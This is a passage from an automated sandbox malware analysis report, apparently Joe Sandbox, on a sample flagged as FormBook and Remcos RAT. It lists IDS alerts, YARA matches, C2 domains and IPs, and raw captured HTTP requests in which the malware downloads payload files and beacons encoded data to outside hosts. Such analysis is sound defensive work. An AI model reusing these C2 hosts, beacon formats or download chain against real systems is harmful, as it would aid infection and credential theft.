              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:01.584087+0200
              SID:2855464
              Severity:1
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:01:56.654315+0200
              SID:2803304
              Severity:3
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-28T14:03:30.124862+0200
              SID:2855464
              Severity:1
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:04:38.000818+0200
              SID:2855464
              Severity:1
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-28T14:03:48.309831+0200
              SID:2855464
              Severity:1
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,17_2_00404423
              Source: unknownHTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_23D710F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49738 -> 172.111.137.132:57484
              Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.137.132:57484 -> 192.168.2.4:49738
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 5.78.41.174:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 162.241.2.92:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 5.78.41.174:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 162.241.2.92:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 203.161.41.205:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 162.241.2.92:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 5.78.41.174:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 34.149.87.45:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 142.250.186.147:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 5.78.41.174:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 162.241.2.92:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 203.161.41.205:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 64.46.102.70:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 34.149.87.45:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 203.161.41.205:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 34.149.87.45:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 203.161.41.205:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 34.149.87.45:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 142.250.186.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 142.250.186.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 142.250.186.147:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80
              Uses dynamic DNS services
              Source: unknownDNS query: name: iwarsut775laudrye2.duckdns.org
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 203.161.41.205 203.161.41.205
              Source: Joe Sandbox ViewASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49741 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 193.25.216.165:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.62.202:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Jouse4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: avocaldoperu.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Jouse1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: avocaldoperu.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /Stevns179.mix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cpanel-adminhost.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wWdnBiepyw166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cpanel-adminhost.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1Host: www.ctorq.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.vendasnaweb1.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1Host: www.411divorce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.gtprivatewealth.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE= HTTP/1.1Host: www.katasoo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.martinminorgroup.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /pbzm/?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s= HTTP/1.1Host: www.atlpicsstudios.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.openhandedvision.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /r9e8/?8le=9XPp_0_hUrF45X&4NZpb=NZnCwFpZhKq0sQLr3EYC0TyIV0Vt7qzpk8sJXmG0u+Dj16JHvnRy3RCRxkJB+yK1MPAIrV8029hJ5TdoPi+z2c1Lq4bOeIsIUJHbQyiTQ7hpVCcnWmpKoKk= HTTP/1.1Host: www.shabygreen.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: avocaldoperu.com
              Source: global trafficDNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficDNS traffic detected: DNS query: cpanel-adminhost.com
              Source: global trafficDNS traffic detected: DNS query: www.ctorq.net
              Source: global trafficDNS traffic detected: DNS query: www.vendasnaweb1.com
              Source: global trafficDNS traffic detected: DNS query: www.411divorce.com
              Source: global trafficDNS traffic detected: DNS query: www.gtprivatewealth.com
              Source: global trafficDNS traffic detected: DNS query: www.katasoo.com
              Source: global trafficDNS traffic detected: DNS query: www.martinminorgroup.com
              Source: global trafficDNS traffic detected: DNS query: www.atlpicsstudios.com
              Source: global trafficDNS traffic detected: DNS query: www.openhandedvision.com
              Source: global trafficDNS traffic detected: DNS query: www.shabygreen.top
              Source: global trafficDNS traffic detected: DNS query: www.kera333.org
              Source: unknownHTTP traffic detected: POST /jk4m/ HTTP/1.1Host: www.vendasnaweb1.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 202Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeOrigin: http://www.vendasnaweb1.comReferer: http://www.vendasnaweb1.com/jk4m/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 34 78 32 78 70 75 4d 43 6c 66 63 72 64 70 4f 6f 4c 6b 4b 65 4b 32 52 78 7a 6c 6d 35 42 49 4f 6c 59 45 33 75 58 2f 70 73 4a 59 54 41 5a 6d 53 41 4d 42 6c 7a 48 31 41 6f 6d 32 35 48 2f 6b 46 4b 74 41 6a 35 65 4c 39 44 49 4b 66 62 71 71 42 50 39 33 2f 76 72 64 59 53 72 43 2b 42 72 63 44 68 74 63 6e 63 44 61 6e 49 39 70 69 77 4f 78 50 63 58 71 66 6e 79 47 48 72 58 42 64 47 69 69 73 78 71 37 31 76 76 4f 55 34 79 6d 6e 44 34 34 65 4d 64 69 2f 4a 67 5a 6b 2f 41 67 6f 44 78 68 6b 5a 7a 63 52 69 4f 33 59 5a 44 32 4e 43 4f 4e 68 6d 70 71 69 72 77 3d 3d Data Ascii: 4NZpb=LWzjlNPDNkqeO4x2xpuMClfcrdpOoLkKeK2Rxzlm5BIOlYE3uX/psJYTAZmSAMBlzH1Aom25H/kFKtAj5eL9DIKfbqqBP93/vrdYSrC+BrcDhtcncDanI9piwOxPcXqfnyGHrXBdGiisxq71vvOU4ymnD44eMdi/JgZk/AgoDxhkZzcRiO3YZD2NCONhmpqirw==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 